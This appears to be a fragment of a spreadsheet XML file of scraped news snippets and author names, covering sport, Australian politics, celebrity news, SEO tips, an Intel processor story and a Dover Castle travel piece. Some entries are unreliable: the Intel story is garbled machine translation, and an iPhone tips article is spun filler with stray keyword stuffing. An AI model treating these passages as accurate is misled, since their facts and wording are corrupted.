large scale Scottish property auctions feature lots from throughout the country including a mix of Commercial and Residential property as well as Land and other development opportunities. “The most important thing for us is to be near the top of the table and getting ourselves out of this division. “I just. Best of Vancouver 2019: City Life – If you thought clipping nails on the bus or SkyTrain was weird, a Georgia Straight staffer witnessed a woman riding a. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists 1. Railway Avenue Dental Dentist. .</t>
  </si>
  <si>
    <t>David Parsley</t>
  </si>
  <si>
    <t>Ratings agency said flexible office group has only between one and two years cash left at current spending rate The post WeWork downgraded to junk status after stock market listing pulled appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Lucy Battersby</t>
  </si>
  <si>
    <t>The S&amp;P/ASX 200 is up by 30 points with Transurban, Woolworths, banks, Santos, and BHP all higher.</t>
  </si>
  <si>
    <t>Labor wants Bob Katter and Barnaby Joyce to be included in a bipartisan war-style cabinet to address the drought crisis.</t>
  </si>
  <si>
    <t>Steve Vivian</t>
  </si>
  <si>
    <t>Police say charges for a 14-year-old boy are expected after an aggressive episode lasting five hours in Darwin's northern suburbs.</t>
  </si>
  <si>
    <t>A meaningful pick-up in business conditions and confidence still proves elusive despite lower borrowing costs and tax refunds flooding back to consumers.</t>
  </si>
  <si>
    <t>The former US defence secretary hits back after the president described him as “the world’s most overrated general”. The post James Mattis mocks Donald Trump at gala dinner appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A protestor in Hong Kong has been hit in the chest with live ammunition for the first time since mass demonstrations began back in June. Pictures were released by protest organisers - appearing to show a masked officer drawing a revolver and firing it towards an activist. Local media says the man is in a critical condition in hospital. Thousands were on the streets as the pro-democracy movement came out in force on the 70th anniversary of communist rule in China. Image: AP</t>
  </si>
  <si>
    <t>whypaymo</t>
  </si>
  <si>
    <t>UPTO 30% Off SOL SANA 50% Off SCOTCH &amp; SODA 30% Off URBAN ORIGINALS 40% Off WATCH STATION Skagen SKT5001 Mens Smartwatch Falster Connected Black 42mm $91.92 Fossil FTW6003 Womens Smartwatch Q Venture Silver-Tone $93.80 - Out of Stock Fossil FTW1161 Mens Q Commuter Gray Hybrid Smartwatch$119.40 My Burberry 90ml EDP (L) SP Womens$75.53 Cybex Eezy S Premium Baby Stroller$229.74 Burberry Body 85ml EDP$53.34 Skagen SKT1200 Mens Jorn Brown Hybrid Smartwatch 41mm$146.30 Terms and Conditions</t>
  </si>
  <si>
    <t>kelad</t>
  </si>
  <si>
    <t>More STEM stuff, but I like the look of this. No IPADs required, which is good! It gets 5 stars from 9 reviews on amazon. Same price on Catch. From reviews it looks like its aimed at the age group 5-8. HONEYCOMB BASIC KIT: An educational gift for every kid on your holiday list - especially budding makers and inventors! Include Power block x 1, Timer blocks x1, Mic blocks x1, Light block x1, Not block x1, Buzzer block x1, LED block x1, Driver block x1, Fan x1, Serve x1, Light bar x1, 9V battery x1, cardboard etc… EASY TO PLAY: A combines groundbreaking tools using sound, light and electricity. Without computer wiring, soldering or programming required, Connect electronic building blocks with magnetic design just like building Lego-bricks, into sequences &amp; patterns to make your beat and sound come alive. The perfect introduction: interested in getting your kid a stem toy but don't know where to start? The basic inventor kit includes everything your kid needs to start inventing out of the box. GET STEP-BY-STEP: Instructions for 9 inventions and hundreds more online. Over 1,500 possible circuit combinations . And works with every other hundreds of Honeycomb module and kit ENGINEER THINKING: Kids can develop as engineering and problem-solving skills by creating interactive inventions and can gain the confidence and curiosity to understand their surroundings and reinvent them HANDS-ON CREATIVITY: fun, entry-level activities help kids unleash their creativity by turning their ideas into inventions.Steam learning: learn real-world steam (science, technology, engineering, art, mathematics) concepts through hands-on inventing. Original Coupon Deal</t>
  </si>
  <si>
    <t>Those unaware of restrictive covenants can become liable for life-changing sums out of the blueTom and Lisa Aldiss* had just bought their first home when the demand arrived. A housing association they had never heard of claimed the developer had breached a restrictive covenant by building their house and demanded they pay £45,000 or face legal action.Restrictive covenants appear on the majority of title deeds for properties in the UK and can prohibit certain uses, alterations or developments. Although solicitors are supposed to flag them up, most homeowners remain unaware of them. And those who inadvertently breach a covenant – or buy from a seller who has already breached it – can find themselves liable for life-changing sums. Continue reading… Read More</t>
  </si>
  <si>
    <t>National Council of Women Australia President Robyn Nolan has called for “accountability” following the closure of White Ribbon, and an inquiry into the anti-domestic violence organisation’s collapse. Ms Nolan also criticised the charity for focusing purely on “raising awareness” rather than developing “proactive programs” to tackle domestic violence. “There is still a need, particularly in schools, to create awareness about this particular issue,” she said. “But when you get out there into the communities you need practical solutions.” Image: News Corp Australia</t>
  </si>
  <si>
    <t>Seven West Ham United Premier League fixtures moved Original Source Seven of West Ham United’s Premier League fixtures in December and January have been moved to new dates or kick-off times, or both! The home matches with Arsenal, Leicester City and AFC Bournemouth have all been switched, as have the away games at Wolverhampton Wanderers, Southampton, Sheffield United and Leicester. To kick-off December, the trip to Molineux has been pushed back 24 hours to 7.30pm on Wednesday 4 December due to Wolves’ participation in the UEFA Europa League group stage. The derby with Arsenal will now be played under the London Stadium floodlights on Monday 9 December, with kick-off at 8pm. The following weekend, the Hammers will travel to St Mary’s Stadium to face Southampton on Saturday 14 December, with kick-off moved to 5.30pm. The first home game after Christmas sees Leicester City visit Stratford on Saturday 28 December at 5.30pm. Due to the Foxes’ involvement in a 5.30pm kick-off at home to Liverpool on Boxing Day, the visit of Brendan Rodgers’ side has also been pushed back. Into 2020 and the visit of AFC Bournemouth to London Stadium on New Year’s Day, Wednesday 1 January, will also kick-off at 5.30pm. Friday night football is back on 10 January, when the Irons travel to Yorkshire to face Sheffield United, with kick-off at Bramall Lane at 8pm. And last but not least, the away fixture with Leicester will now be played at King Power Stadium at 7.30pm on Wednesday 22 January. Full ticket details for all of the above fixtures will be announced on whufc.com in due course. For a full 2019/20 fixture list, click here.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Seven West Ham United Premier League fixtures moved appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Bachelor star Simone Ormesher flaunts her incredible weight loss after baby – Laskafitness She welcomed her first child, daughter Gracie-Mae, less than two weeks ago. And on Saturday, The Bachelor’s Simone Ormesher, 27, flaunted her incredible post-baby body in a tight white crop top and jeans. Taking to Instagram, the blonde bombshell posed next to her partner Matt Thorne during a leisurely weekend outing in Melbourne. Bachelor star Simone Ormesher, 26, has flaunted her incredible weight loss in a tight white crop top on Saturday… just weeks after welcoming her first child Simone wore her trademark blonde hair in a stylish half-up, half-down style while Matt put a protective arm around her in the snap. ‘Mum and dad club,’ she captioned the post. The casual snap sent the reality TV star’s fans into a frenzy, with many gushing over the personal trainer’s astonishingly svelte post-baby physique. ‘So happy with the progress of my body’: Simone revealed she’s already back to her pre-pregnancy weight on Wednesday, just eight days after giving birth ‘How do you look so amazing after just having a baby???’ one fan wrote. Another added: ‘I swear you were pregnant two weeks ago…or did I imagine that?? Look at your bod!!!’ Simone revealed she was almost back to her pre-pregnancy weight in a selfie on Wednesday last week, only eight days after giving birth. New addition! Simone welcomed her first child, daughter Gracie-Mae, just last week Taking to Instagram, the new mother posed up for a mirror selfie in a crop top, writing in part of her post: ‘I am so happy with the progress of my body.’ ‘Eight days PP (postpartum) I am so happy with the progress of my body it is bloody amazing how it all works, especially to think I had Gracie-Mae inside there last Tuesday,’ Simone’s post began. ‘Throughout my pregnancy I didn’t really work out too much as I lost all motivation for fitness,’ she said. How she did it: She added that she made sure to watch her diet while pregnant and believes that it’s helped her bounce back after having her child She added that she made sure to watch her diet while pregnant and believes that it’s helped her bounce back after having her child. ‘But I did continue to eat as well as I could throughout my entire pregnancy and also used creams on my stomach twice a day and I really believe that’s what has helped me go back to my pre-pregnancy weight.’ At the weekend, Simone posed up for a body shot just three days after giving birth. In the post, she said she had been emotional and that her breasts were ‘hurting like a motherf**ker.’ Candid: At the weekend, Simone posed up for a body shot just three days after giving birth (pictured). In the post, she said she had been emotional and that her breasts were ‘hurting like a motherf**ker’ ‘I will be taking it super easy and soaking in mum life for the next six weeks but focusing on clean eating and then will slowly get back into my fitness routine once my mind and body is healed,’ Simone said. Simone announced the birth of Gracie-Mae on Thursday, taking to Instagram to share sweet snaps of her newborn. She said that her baby was admitted to the Neonatal Intensive Care Unit. ‘We could not have asked for a more stronger, amazing baby girl we are so in love,’ part of Simone’s post read, with Simone sharing Gracie-Mae with partner Matt Thorne. Her girl: Simone announced the birth of Gracie-Mae on Thursday of last week, taking to Instagram to share sweet snaps of her newborn Share or comment on this article: Original Source Follow Laskafitness on Instagram The post Bachelor star Simone Ormesher flaunts her incredible weight loss after baby – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Ten-year-old Melissa Tate died the day after she was struck by a car in Newcastle last month. The post Melissa Tate death: Girl’s donated organs ‘save four lives’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Source: https://readwrite.com/2019/10/18/4-mistakes-of-machine-learning-startups/ 4 Mistakes of Machine Learning Startups Have you heard of the Darwin Awards? Hop on YouTube and take a look. It’s generally pretty funny stuff. It’s a tongue-in-cheek honor that recognizes people for the most sophisticated attempts to do something they think is cool. One takes a selfie with a wounded bear, another one screws a jet engine to a skate. These bold actions lead to fatal mistakes with dire consequences and funny comments. Spoiler alert — sadly — they all die. You don’t want your startup “to die” from the mistakes of machine learning. For the past 25 years, I’ve seen thousands of times when a person makes errors — but never when a machine makes a mistake. Today, a blunder in the learning projects can cost companies millions and several years of useless work. For this reason, the most common errors in machine learning related to data, metrics, validation, and technology are collected here. artificial intelligence Data. Chances to make a mistake working with data are rather high. It is easier to successfully pass a minefield than not to make a mistake while working with the data set. Moreover, there can be several common mistakes: Unprocessed data. Unprocessed data is rubbish that will not allow you to be confident about the adequacy of the constructed model. Therefore, only pre-processed data should be the basis of any AI project. Anomalies. To check data on deviations and anomalies and get rid of them. Getting rid of errors is one of the priorities of every machine learning project. The data may always be incomplete, incorrect, or some information may be lost for some period. Lack of data. Perhaps, the easiest way is to conduct 10 experiments and get the result, but still not the most correct one. A small and unbalanced amount of data would drive to a conclusion far from the truth. So, if you need to train the network to distinguish spectacled penguins from spectacled bears, a couple of bears’ photos won’t fly. Even if there are thousands of penguins’ images. Lots of data. Sometimes limiting the amount of data is the only correct solution. That is how you can get, for example, the most objective picture of human actions in the future. Our world and the human race are incredibly unpredictable. As a rule, to foretell someone’s response based on their behavior in 1998 is like reading tea leaves. The result, being quite the same, will be far from reality. Metrics Accuracy is an essential metric in machine learning. However, senseless seeking absolute accuracy can become a problem for an AI project. Particularly, if the goal is to create a predictive recommendation system. It is obvious that the accuracy can reach an incredible 99% if the grocery online-supermarket offers to buy milk. I bet a buyer will take it, and the recommendation system will work. But I’m afraid he would buy it anyway thus there is little sense in such a recommendation. In the case of a city resident, who buys milk daily, it is an individual approach and promotion of goods (which the one didn’t have in the basket earlier) that matters in such systems. Validation A child learning the alphabet gradually masters letters, simple words, and idioms. He learns and processes information at a certain level. At the same time, the analysis of scientific papers is incomprehensible for the toddler, although the words in the articles consist of the same letters that he learned. The model of an AI project also learns from a specific data set. However, the project won’t handle an attempt to check the quality of the model on the same data set. To estimate the model, it is necessary to use specially selected for verification pieces of information that were not used in training. In such a way, one can achieve the most accurate model quality assessment. Technology The choice of technology in an AI project is still a common mistake, leads if not to fatal, but serious consequences that influence the efficiency and time of the project deadline. No wonder, you can hardly find a more hyped theme in machine learning than neural networks, due to its suitable-to-any-task universal algorithm. But this tool won’t be the most effective and the fastest for any task. The brightest example is Kaggle competition. Neural networks do not always take the first place; on the contrary, random tree networks have more chances to win; it is primarily related to tabular data. Neurons are more often used to analyze visual information, voice, and more complex data. Using a neural network as a guide one can see, nowadays, it is the simplest solution. But at the same time, the project team should understand clearly what algorithms are suitable for a particular task. I truly believe machine learning hype won’t be false, exaggerated, and ungrounded. Machine learning is another engineering tool that makes our life simpler and more comfortable, gradually changing it for the better. For many massive projects, this article may be just a nostalgic retrospective about the mistakes they have already made but still managed to survive and overcome serious difficulties on the way to the product company. But for those who are just starting their AI venture, this is an opportunity to understand why it isn’t the best idea to take a selfie with a wounded bear and how not to fill up the endless lists of “dead” startups. The post 4 Mistakes of Machine Learning Startups appeared first on ReadWrite. Source: https://readwrite.com/2019/10/18/4-mistakes-of-machine-learning-startups/ The post 4 Mistakes of Machine Learning Startups appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Adelaide United coach Gertjan Verbeek says the video review system had taken a "crazy" amount of time to settle contentious calls in the A-League season-opener.</t>
  </si>
  <si>
    <t>Broede Carmody</t>
  </si>
  <si>
    <t>"Every day I get this incredible adrenaline hit," the veteran broadcaster says. "I will really miss that."</t>
  </si>
  <si>
    <t>Man City midfielder Ilkay Gundogan hits back at criticism over Instagram activity Original Source Manchester City midfielder Ilkay Gundogan has defended himself over criticism of his recent activity on Instagram. Gundogan ‘liked’ a picture uploaded by Everton and Turkey forward Cenk Tosun which carried the caption: “For our nation, especially for the ones who are risking their lives for our nation.” The picture was of Tosun and his Turkey teammates celebrating a goal in their 1-0 victory over Albania on Friday night with a military-style salute. The celebration is widely believed to have been a gesture of support for the Turkish armed forces in the conflict with Syria. However, Gundogan would later remove his like from the post over suggestions he was endorsing Tosun’s supposedly politically charged post. “It is blatant what is written these days is for clicks,” Gundogan said after scoring twice in Germany’s 3-0 win over Estonia on Sunday night. “I thought I liked a photo of a friend I’ve lived with in Manchester, who’s having a tough time at Everton, barely playing, then scoring a goal and leading his team to victory. “Next, I believe 200,000 other people have liked this image, footballers from all over the world. Then we are the two picked and made a story out of. It’s a pity. Read More Read More “There was absolutely no political intention behind it. Emre [Can, who also ‘liked’ and ‘unliked’ the picture] and I are both consistent against any kind of war and terror, no matter where it takes place in the world. “That’s why it was only intended as a pure support for our friend.”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 City midfielder Ilkay Gundogan hits back at criticism over Instagram activity appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>We'll hear from our correspondent on the ground and look at who is selling weapons to Turkey. 'Tortured' and shackled pupils are freed from a Nigerian Islamic school. Bulgaria's Football Union president Borislav Mihaylov resigns following the racist abuse of England players by fans in Sofia.</t>
  </si>
  <si>
    <t>birdopoel posted a photo: an abandoned futuro house in the Wanli ufo village Recent Uploads</t>
  </si>
  <si>
    <t>Queensland Conservation Council says the state should set up a stand-alone Office of Climate Change.</t>
  </si>
  <si>
    <t>Are you interested in using an iphone but fear that you will not understand how to do so? Unsure that you will know what to do with it? Well, fear not. This article will provide you with all the advice you need to make you an expert an using your iphone. Make sure your phone is using the latest updates. Doing this ensures that your phone has all the latest options and software fixes. This makes sure that any photos or important information are stored on your system in case something goes wrong with your phone. To dry a soaked phone, use rice. Nearly everyone has dropped a phone in a puddle, sink or even a toilet. Dry your iphone with a towel as well as possible, then seal it in a bag that has dry rice in it. This should dry out the phone, usually after a few hours or by waiting until the following morning. Once you know how the volume button can be used to take a photo, try using the headphone cord to snap a picture. Keep your hand steady while you are in the process of taking it, and then once you are ready, press the button that is on the cord. By doing this, you do not shake the iPhone, which will ensure your shot is clear. You should buy a screen to protect your iphone. This will help to prevent scratches, which can damage the look of your device. Just a tiny speck of dirt can scratch the screen. Your Iphone deserves a protective screen to keep it looking new. Through the aid of Siri, you can create custom location reminders. You do not have to say “At five I have to call work, Siri.” Now, you can simply say “when I arrive home” instead of specifying a time. When the iPhone detects you have arrived at the destination, it will give a reminder alert. This is convenient for times that you want a reminder, but don’t know exactly what time you’ll need the reminder. Headphone Cord If you are working in Safari, it is simple to initiate a phone call with a simple touch. For instance, imagine you are looking for a dry cleaner online. Once you locate a telephone number for it, you do not need to return to the phone feature to call it. Touch the number itself, and the connection will be made automatically. Taking pictures from the headphone cord on the iphone can save a lot of time and effort. Simply frame the picture that you wish to take. You should push the button located on your headphone cord to take the picture. Your picture is recorded. You can save the picture by following the same steps you would normally. To ensure the safety of your device, buy a screen protector. Without a screen protector, you will scratch the face of your phone over time. Something as small as dirt can scratch the screen. Be sure that you always have a screen protector on your phone. You can easily message much faster using this simple trick. When a dictionary suggestion appears that is not the word you want, make it disappear with a tap to any part of the screen. You need not close it using the small “x”. You can use your iPhone as a storage device for files by downloading an app that enables you to put files onto your phone. With this app, you are able to upload pictures, brief videos, music and text files. Just use the iPhone directly or connect to a computer to see the files. As an iphone owner, be sure to utilize all of the phone’s multimedia capabilities. You can download or stream videos, films, television shows and more from hundreds of different websites. Your iphone can be an extremely powerful portable media station. Did you change your mind about something you wrote in iMessage? Did Auto Correct mess up your meaning yet again? There’s a very simple way to take back your words; quickly shake your iPhone. This is akin to the undo button on a computer. Since this feature is optional, you will have to enable it through the Settings menu. When your email is tagged to your iphone, you’ll be alerted to email quickly on your phone. This will allow you to see your emails immediately. You can tag one account, or multiple accounts if you want. You can take a screenshot using your iPhone. When you are looking at what you want the screenshot of, press Sleep and Home together. The screen will turn a white color when your screenshot has been taken and saved. It’s that simple! Second thoughts about something you entered in iMessage? Auto Correct sometimes corrects words you do not wish to be corrected. Giving your iphone a swift rattle is a really simple way to fix this. It erases the most recent typing you have entered. Go to the Settings menu to make sure this function is enabled. If your iPhone ever freezes and you cannot revive it by pressing the “Wake” button, you may need to perform a hard reset. Press the sleep button and home button at the same time for several seconds. This will shut off and restart your iPhone. To quickly browse a website, you can alternate between scrolling with one and two fingers. If the page has multiple text boxes, using one finger to scroll will let you scroll through a single box. The two finger option will move you through the whole page. Always remember to keep the iPhone firmware updated. Not only will it extend the life of the battery, but it will make your phone more functional. The easiest way to do this is to connect your iPhone to a computer that has iTunes downloaded on it. Another option is to just use your iCloud application to allow your phone and computer to communicate with each other. You now know all about how an iphone works. An iphone is only as good as its user. By applying all that you have learned from this article, you will be able to utilize your iphone to its full potential. If you’re an iPhone owner, it’s important that you not get app crazy. There are so many wonderful iPhone apps, some of which are free, while others that cost money. Look into them carefully as some of them may charge you a fee that is not obviously disclosed at the time of the download. After you’ve read this article, you should see that the topic of betamax voip comparison is a bit complex. Not only do you need accurate information about betamax voip comparison, but it also needs to be timely and up-to-date, as well. You will be helped to no end after reading this article about betamax voip comparison.</t>
  </si>
  <si>
    <t>The future Intel Cascade Lake X processors are not quite so much more affordable, they also seem to be quite impressive overclockers. At least that's what Intel tells us. The 18-core Core i9 10980XE – the HEDT processor with an infinitely long chain of numbers – would be able to hit 5.1GHz on all hearts with just a little bit of overclocking. With an all-core Turbo clock speed rated at only 3.8 GHz for the base specification chip, it's a very big boost in overclocking. And with 18 hearts running at this rate, the new Cascade Lake X monster would be really impressive. And if this pace can be matched a little further down the stack, then something like the ten-core Core i9 10900X could become a really good gaming processor at its new, more affordable price. The new range of high-end desktop processors is expected to be launched in November after a huge "price reset" compared to the latest generation of X-Series processors. Which is a good thing considering that nothing can be done. other seems to have changed with them, with the exception of a slight slowing of the pace. Halving the price is probably their only real chance of repelling the Threadripper's third-generation assault. All X Series processors are unlocked, which means you can adjust the proverbs of their silicon for the highest clock speeds. Whether you're talking about chips at 18, 14, 12 or 10 hearts, everything is up for grabs. With the 9th generation X-Series processors, there would not be much extra room left, while Cascade Lake X could offer a lot more. "You can overclock that and get really interesting results," says Mark Walton of Intel. "For example, we had the eighteen 10980XE processor, reaching 5.1 GHz in the lab using standard liquid cooling. And that, I believe, it's all hearts. " Obviously, there are reservations about this … all the chips are not equal, and so on. "It's only an example of a chip we had at the lab," says Walton, "so it's possible that this does not reflect all the chips." Let's be clear, each chip is different, some ships will be more overclocked than others, but it is possible. " The kernels The sons Turbo Price $ By kernel Core i9 10900X ten 20 3.8 GHz $ 590 $ 59 Core i9 10920X 12 24 4.1 GHz $ 689 $ 57 Core i9 10940X 14 28 4.3 GHz $ 784 $ 56 Core i9 10980XE 18 36 4.3 GHz $ 2,000 $ 54 Ryzen 9 3900X 12 24 4.6 GHz $ 499 $ 42 Ryzen 2920X 12 24 4.3 GHz $ 649 $ 54 Ryzen 2950X 16 32 4.4 GHz $ 899 $ 56 Ryzen 2970WX 24 48 4.2 GHz $ 1,799 $ 54 If an expensive Intel mega-core processor costs around 5 GHz on all pre-launch cores sounds a bit unfamiliar, it's possible that you're thinking about that 28-core processor that Gregory Bryant introduced on stage at Computex a few short ago years. Yes, the one that Intel forgot to tell us was overclocked and was using an industrial cooling unit attached to it to survive with a 5GHz heart-on-stage playback. But that is not it. When Intel talks about "standard liquid cooling," that's exactly what they mean. "There is no refrigeration unit, there is nothing like that," reassures Walton. "When we talk about" standard liquid cooling, "I do not know the product in question, but we're talking about a 240 or 280 mm radiator, that sort of thing. Nothing extraordinary. " The new Cascade Lake X chips will be available in November and offer for the first time a truly accessible step from Intel's standard desktop range to the more serious X-Series processors for both creative and professional users. INFO Buy now</t>
  </si>
  <si>
    <t>Per caleygraph2015: Straight Line of the Day: Having remade and rebooted every movie franchise, Hollywood is moving on to rebooting… 0 0</t>
  </si>
  <si>
    <t>Emily Wright</t>
  </si>
  <si>
    <t>Rugby is approaching a tipping point where the players simply can’t get any bigger. Those are the views of Wales’ head of physical performance Paul Stridgeon, who feels that the way the game is evolving will see the increasing size of players level off. Stridgeon, who has worked with England, Wasps, Toulon and the British and Irish Lions, has been involved with Warren Gatland’s Wales side since the preparations for the 2015 Rugby World Cup. He has been involved in the game since 2002 and insists that the increase in the amount of running players are now asked to do will punctuate the trend of them getting bigger and bigger. “The game is so much more running-based, the contacts are bigger and it takes the boys a lot longer to recover from the games,” he said. “There’s just a lot more running, especially for the forwards as well over the last few years, it’s massive. “When I started in 2002, the game was totally different. You wouldn’t recognise it.” He added: “Because of the laws of the game, I think players will stop getting much bigger. “It’s much more of a running-based game. You don’t see massive 140kg props any more because of the amount of running. “It will level out and players’ bodyweights will plateau. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel “The game is getting faster all the time as players get fitter and faster but I can’t see it going much further with the rules we have now.” Stridgeon is a highly-valued member of Gatland’s backroom staff and his role extends far beyond simply putting the players through their paces. He is a bundle of energy and always has a spring in his step, a joke up his sleeve and a story to tell. If he wasn’t an expert in getting players to their physical peak, Gatland may have even brought him out to Japan just to ensure morale remains high in camp. Wales winning their first two matches of the tournament meant that it was time for the infamous ‘Bobby Cup’. To give the squad a laugh, Stridgeon records a ‘Through the Keyhole’ style video and plays it a team meeting along with a series of other practical jokes. It ends in the presentation of the ‘Bobby Cup’ which is awarded to the most impressive player on tour that week. “That’s probably 50 per cent of my job! We had a Bobby Cup a few days ago and the boys loved it!” He beamed. “As soon as we won the game against Australia Alun Wyn Jones said ‘that’s brilliant’ because we have to win two games in a row to get a Bobby Cup. “Me and the analysts spent a lot of time – about five hours – before the Bobby Cup preparing for that. It went down well. It was good. “We had a lot of online clips from the boys going into their rooms through the keyhole. There was a ‘Whose room is this?’ And a bit of a mystery thing. Alun Wyn Jones during training (Image: Ben Evans/Huw Evans Agency) “Alun Wyn Jones ended up winning the Bobby Cup this week. It was well deserved. It was a proper leadership performance (against Australia) and he works hard.” When you see Stridgeon roaming around the team hotel or the training field, it’s difficult to imagine him switching off. But as soon as the door on his bedroom slams shut, that’s exactly what he does. He’s either full throttle or ripping up the handbrake. “I’m 100mph when I’m outside of my room,” he explained. “As soon as I get inside my room, I’m asleep! “People think that I must be running around all night but I’m either 100mph or completed stopped.” During Wales’ gutsy 29-25 victory over Australia last week in Tokyo, Wales were asked to defend for large parts of the second half. Our brilliant Rugby World Cup coverage Cardiff Blues coach John Mulvihill joined our daily Facebook show, The Gain Line, on Friday. You can watch it here every day. Follow our 24-hour rolling live news service covering everything that’s happening. Tune in for the best reaction and analysis as we record three episodes of The Welsh Rugby Podcast per week (Apple sign up: https://apple.co/2UA707b / all other devices: https://bit.ly/2yDFD3l ) Get the latest updates straight to your phone through our WhatsApp news service (full details here). Start your morning with our daily rugby newsletter, which you can sign up for here. Follow us on Twitter , Facebook , YouTube and Instagram Got a view on a key selection debate? Have your say on the burning issues of the day by joining our RWC Facebook forum. Defence coach Shaun Edwards was quick to praise the work of the strength and conditioning staff, pointing out the players’ heroic efforts would not have been possible if they weren’t fit enough. That’s music to the ears of Stridgeon, who claims this current Wales squad is the best-prepared group of players he’s ever worked with. “The coaching group allow us to get the strength and conditioning work in that we need,” he said. “We don’t train for long periods, but we train intensively, and because the coaches allow the boys some decent recovery time and some time off, we can make some good gains, even in tournaments. “They back us up massively on that and it was brilliant for us to hear that (Edwards’ praise). It helped us in the second half when we were defending for long periods. “It’s the best prepared squad I’ve worked with by far. The boys are in a good place physically.” The post Wales fitness chief: Rugby approaching tipping point where players will stop getting bigger appeared first on East London Observer.</t>
  </si>
  <si>
    <t>SEO (search engine optimisation) is critical for driving traffic to your website. As the name suggests, SEO content makes it easy for search engines to find your text and therefore your website. Bob Milliken To create strong content, it’s important that you understand and incorporate these five key principles in your writing: keywords, title, meta tag, meta description and backlinks. Keywords Keywords are an important component of SEO and determine whether or not your website is found through keyword searches. To develop strong keywords in your text, my best advice is to start with research to determine what types of things people are searching for in relation to your business. Online tools, such as Google Ads Keyword Tool, are good for determining if specific keywords are too competitive and therefore will limit the chances of your website being seen. Also, Using longer keywords is a good trick (see last week’s article) for ranking higher as these key words tend to be in less competitive keyword niches. Titles Getting the title of your content is also crucial when it comes to SEO. Follow my three suggestions when developing the heading. First, consider the length. Most search engines display only 50-60 characters of a heading in their search results so stick to this limit. Second, titles need to immediately grab our attention, be engaging, and relevant to the content. However, make sure that the title accurately describes and reflects the piece that it is attached to. Third, you will need to include keywords in your title. Keywords are best added at the beginning of a title making it more likely your content will be found. Meta Descriptions Every time you conduct a search, you will see a list of titles that match your keywords as well as a meta description that outlines the page and the relevance of the searched keyword. Use these 50-160 character meta descriptions to succinctly tell your audience its worth for them to visit your site. Backlinks Get out there and form partnerships and include high-quality, relevant links to their sites. Backlinks are valuable SEO tools because they represent a “vote of confidence” from one site to another. And they are an effective way to significantly increase your audience. Images SEO content is typically about the written aspects, but the inclusion of images should not be forgotten. Use image captions and tags to highlight your keywords and increase search engine optimisation. Take Away Boost your website traffic with my five key SEO tricks. You’ll be surprised by the results. If your website is collecting leads and converting them into hot prospects, congratulations. If not, give us a call. We are SEO lead generation experts who excel at delivering leads, customers and sales. Bob Milliken is a master marketer specializing in helping businesses achieve outrageous levels of success. Bob can be reached by phone at 604.270.1730 or by email at bob@rfmholdings.com</t>
  </si>
  <si>
    <t>Australia has a new-look 'lobster' and it feels different too.</t>
  </si>
  <si>
    <t>via …you’re just tryin’ to catch up!</t>
  </si>
  <si>
    <t>The sold-out event will see 50 people dine with Mo and Leonard, who are described as social, sensitive and curious animals.</t>
  </si>
  <si>
    <t>The federal government is expected to give the competition watchdog the green light for an inquiry into why banks have not fully passed on interest rate cuts.</t>
  </si>
  <si>
    <t>German Norwegian Hangman game – select either to guess the German or the Norwegian word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading German Norwegian Hangman →</t>
  </si>
  <si>
    <t>Martin Boulton</t>
  </si>
  <si>
    <t>Voting is now open to the public for the Victorian music awards.</t>
  </si>
  <si>
    <t>Looming high over Dover town centre is the mighty fortress that remarkably includes almost every era in English history from Roman to WW2. Although Dover Castle boasts a rare Roman lighthouse, the bulk of what we see above ground today is either Henry II, or Napoleonic, when massive rebuilding was undertaken. A visit starts, for most visitors, with a glutes enhancing climb up a very steep hillside and through the gatehouse, and a WW2 era traffic light, and then you can actually wander around fairly freely despite the many signs warning that payment is needed past this point. You will need a ticket though if you want to go past the inner ring of stone into the centre of the castle. Up here is the massive stone keep, one of the last built in England in the square style. Inside is however wonderfully medieval, and a total maze of stone corridors and spiral staircases. There are a number of large rooms set up as if the Lord or King is visiting, but really the best fun is to be had getting slightly lost in the corridors and small rooms that are all over the place. One tiny gap in the wall lead to a chapel with ethereal music and stained glass windows, while stone staircases spiralised their way up and down and at odd shaped junctions. Some corridors are empty dead ends and as much fun to wander down to see, nothing much, but keep rambling around. Eventually you end up on the roof, with views across the local town, and of course, the English Channel looking out for invaders. From up here you can see an old church, and a stone tower next to it, which turns out to be the Roman era lighthouse, one of only three surviving Roman-era lighthouses in the world. It was used for a while as the bell tower for the church next door, but not any more. The church is also ancient, although heavily restored/modernised by the Victorians. It’s also a functioning military chapel, and still holds regular services. Something that few seemed to peer inside while I was there is a separate museum, of the Princess of Wales’ Royal Regiment and The Queen’s Regiment, and is a series of rooms showing off their historical activities, and a rather realistic replica of a WW1 trench. Having been above ground, this is a castle that’s also as famous for what’s underground. Not that easy to find, there are the medieval tunnels, a twisting warren under the castle ranging from lined walls to rough stones and lots of steep slopes to walk up and down. A corridor lined with cannon to fire into the moats if anyone got into them. It also turned out to be a dead end, so you have to head all the way back, and up an earlier dauntingly steep slope down that is now exhaustingly steep up on the way back out. A bit like Dover town itself, the castle seems to involve a lot of going up and down slopes and stairs. The point is not that there is a huge amount of history to see, nor is the place packed full of historic objects to see and signs to read. It’s a place to soak up the atmosphere of an awful lot of stone piled up to form a castle. It’s a place you wont leave with your head spinning from all the history on show, unlike say Windsor Castle which is overflowing with history. This castle is one to wander around delightfully discovering tunnels and corridors and odd spaces to explore. It’s also a castle with a lot of spaces to explore around the perimeter, small towers with nothing to see but the thrill of having realised you can go inside them. A surly child sulked as dad took a photo, then screamed repeatedly when dad was more interested in something else. Another exclaimed loudly what’s the point of visiting if everything is private, having gone to one solitary door thus marked. Those sulky kids aside, what is clear is that this is a very family friendly site, if you have kids who think the idea of climbing around an old stone castle and exploring secret spaces is their idea of fun. It certainly is mine. I spent a good half-day there, and 